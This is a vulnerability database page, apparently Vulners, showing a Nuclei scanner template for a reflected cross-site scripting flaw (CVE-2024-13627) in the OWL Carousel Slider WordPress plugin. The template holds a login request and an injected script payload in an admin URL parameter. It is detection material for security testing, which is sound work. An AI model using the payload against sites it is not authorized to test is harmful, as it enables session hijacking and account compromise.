Lucene search
K

OWL Carousel Slider - Cross-Site Scripting

🗓️ 13 Jul 2026 04:38:23Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 6 Views

OWL Carousel Slider WordPress plugin has reflected cross-site scripting due to unsanitized output.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13627
17 Feb 202506:15
circl
CNNVD
WordPress plugin WP Touch Slider 安全漏洞
17 Feb 202500:00
cnnvd
CVE
CVE-2024-13627
17 Feb 202506:00
cve
Cvelist
CVE-2024-13627 WP Touch Slider <= 2.2 - Reflected XSS
17 Feb 202506:00
cvelist
EUVD
EUVD-2024-51697
3 Oct 202520:07
euvd
NVD
CVE-2024-13627
17 Feb 202506:15
nvd
OSV
CVE-2024-13627
17 Feb 202506:15
osv
Patchstack
WordPress WP Touch Slider plugin <= 2.2 - Reflected XSS vulnerability
17 Feb 202510:58
patchstack
Positive Technologies
PT-2025-6587
17 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13627
19 Feb 202506:23
redhatcve
Rows per page
id: CVE-2024-13627

info:
  name: OWL Carousel Slider - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    OWL Carousel Slider WordPress plugin v2.2 contains a reflected cross-site scripting caused by unsanitized parameter output in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft malicious URL.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape parameters properly.
  reference:
    - https://wpscan.com/vulnerability/f7e425a1-ae49-4ea6-abe4-42ba2713af8f/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 4.7
    cve-id: CVE-2024-13627
    cwe-id: CWE-79
    epss-score: 0.00805
    epss-percentile: 0.52468
    cpe: cpe:2.3:a:wp-buy:owl_carousel_slider:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-buy
    product: owl_carousel_slider
  tags: cve,cve2024,wp-scan,wp-plugin,wp-buy,owl-carousel-slider

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=wpoc_edit&id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>")
        condition: and
# digest: 490a0046304402202d3efe3c8092554f25768455d72d52d4b905fced0c54ade72028df238a439108022030ea14d4f4e7d9d74600d2ddcb747490d6189a9bc43d10653053ca6eee72c977:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:34Current
7.2High risk
Vulners AI Score7.2
CVSS 3.14.7
EPSS0.00805
SSVC
6